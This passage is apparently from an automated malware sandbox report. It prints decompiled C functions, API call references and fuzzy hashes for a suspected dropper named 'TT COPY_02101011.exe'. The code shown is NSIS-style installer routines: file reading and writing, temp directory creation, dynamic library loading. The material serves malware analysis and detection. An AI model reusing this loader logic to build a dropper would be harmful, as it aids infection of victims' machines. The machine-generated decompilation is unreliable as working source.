								if(E00403066(0x414b80, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E00403066(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afc8 = 8;
					 *0x414b70 = 0x40cb68;
					 *0x414b6c = 0x40cb68;
					 *0x414b68 = 0x414b68;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E00403066(0x414b80, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afb8 = 0x414b80;
						 *0x40afbc = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc0 = _t100;
							 *0x40afc4 = _v12;
							_t79 = E00405D23("KsA");
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40afc0; // 0x41f4c3
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404CC9(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40afc0; // 0x41f4c3
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

0x00402e4c
0x00402e50
0x00402e53
0x00402e58
0x00402e5a
0x00402e5a
0x00402e61
0x00402e65
0x00402e6a
0x00402e6c
0x00402e6c
0x00402e73
0x00402e78
0x00402e7a
0x00402e83
0x00402e83
0x00402e8e
0x00402e95
0x00403011
0x00403011
0x00000000
0x00402e9b
0x00402e9f
0x00402ffc
0x00403051
0x00403016
0x0040301c
0x0040301e
0x0040301e
0x0040302f
0x00000000
0x00403031
0x00403044
0x00402ff6
0x00402ff6
0x00403013
0x00403013
0x00000000
0x0040304b
0x0040304b
0x0040304e
0x00000000
0x0040304e
0x00403044
0x0040302f
0x0040305c
0x00000000
0x0040305c
0x00403001
0x00403003
0x00403003
0x0040300f
0x00403059
0x00000000
0x00000000
0x00000000
0x00000000
0x0040300f
0x00402eab
0x00402ead
0x00402eb4
0x00402ebb
0x00402ebb
0x00402ec2
0x00402eca
0x00402ed4
0x00402ed9
0x00402ee1
0x00402eeb
0x00402eee
0x00000000
0x00000000
0x00000000
0x00000000
0x00402ef4
0x00402ef4
0x00402ef4
0x00402efc
0x00402efe
0x00402efe
0x00402f0f
0x00000000
0x00000000
0x00402f15
0x00402f18
0x00402f1e
0x00402f24
0x00402f24
0x00402f2f
0x00402f35
0x00402f3a
0x00402f41
0x00402f44
0x00000000
0x00000000
0x00402f4a
0x00402f50
0x00402f52
0x00402f5b
0x00402f5d
0x00402f8b
0x00402f91
0x00402f9a
0x00402f9f
0x00402f9f
0x00402fa6
0x00402fea
0x00000000
0x00000000
0x00000000
0x00402fa8
0x00402fab
0x00402fcd
0x00402fd2
0x00402fd5
0x00402fd8
0x00402fdb
0x00402fdf
0x00000000
0x00000000
0x00000000
0x00402fe5
0x00402fb9
0x00402fc1
0x00000000
0x00402fc8
0x00402fc8
0x00000000
0x00402fc8
0x00402fc1
0x00402fa6
0x00402ff2
0x00000000
0x00402ff2
0x00000000
0x00402ef4

APIs

GetTickCount.KERNEL32 ref: 00402EAB
GetTickCount.KERNEL32 ref: 00402F52
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
wsprintfA.USER32 ref: 00402F8B
WriteFile.KERNELBASE(00000000,00000000,0041F4C3,7FFFFFFF,00000000), ref: 00402FB9

Strings

... %d%%, xrefs: 00402F85
KsA, xrefs: 00402F18, 00402F2A

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%$KsA
API String ID: 4209647438-1260645078
Opcode ID: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
Instruction ID: 9e0124e4ae7d277b0b54c9942477664c6d45ab1b3c5c68ad5b6cbbf63d84754e
Opcode Fuzzy Hash: 82a9aedbd2f3b533e53c55a0f3032eb9fe86cf46c86e88442e97a38cb8fe0156
Instruction Fuzzy Hash: A5619E7180120ADBDF10DF65DA48A9F7BB8BB44365F10413BE910B72C4C778DA51DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404CC9(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x0040200b
0x00402156
0x00402156
0x0040287d
0x00402880
0x0040288c
0x0040288c
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f8c
0x00401f92
0x00401f96
0x00402004
0x00000000
0x00402004
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00401ff9
0x00401ff9
0x00000000
0x00401ff2
0x00401f7c
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041F4C3,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041F4C3,73BCEA30), ref: 00404D25
Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9

Strings

B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B
API String ID: 2987980305-3806887055
Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E004054B2(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405449(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402156
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x00402880
0x0040288c

APIs

Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,00000000), ref: 004054C0
Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E

Uniqueness

Uniqueness Score: -1.00%

Function 00405631, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x00405635
0x0040563b
0x0040563c
0x0040563c
0x0040563d
0x00405644
0x0040564e
0x0040565b
0x0040565e
0x00405666
0x00000000
0x00000000
0x0040566a
0x00000000
0x00000000
0x0040566c
0x00000000
0x0040566c
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405644
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405631, 00405634
nsa, xrefs: 0040563D
"C:\Users\user\Desktop\TT COPY_02101011.exe" , xrefs: 00405638

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\TT COPY_02101011.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3263382165
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9

Uniqueness

Uniqueness Score: -1.00%

Function 004030AF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004030AF(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405B89(_t6);
				_t2 = E0040548B(_t6);
				if(_t2 != 0) {
					E0040541E(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E00405631("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x004030b0
0x004030b6
0x004030bc
0x004030c3
0x004030c8
0x004030d0
0x004030dc
0x004030e2
0x004030c6
0x004030c6
0x004030c6

APIs

Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\TT COPY_02101011.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030B0, 004030B5, 004030BB, 004030C7, 004030CF, 004030D6
1033, xrefs: 004030D7

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42eb90; // 0x571d2c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e34c =  *0x42e34c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405602, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405602(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405606
0x00405613
0x00405628
0x0040562e

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\TT COPY_02101011.exe,80000000,00000003), ref: 00405606
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16

Uniqueness

Uniqueness Score: -1.00%

Function 004055E3, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055E3(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x004055e7
0x004055f0
0x00000000
0x004055f9
0x004055ff

APIs

GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A

Uniqueness

Uniqueness Score: -1.00%

Function 00403066, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403066(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040306a
0x0040307d
0x00403085
0x00000000
0x0040308c
0x00000000
0x0040308e

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680574103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680607574.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680617982.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680649424.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403098, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403098(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004030a6
0x004030ac

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,000081E4), ref: 004030A6

Memory Dump Source

Source File: 00000000.00000002.680557844.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680549996.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680567147.0000000000407000.00000002.00020000.sdmp Download File
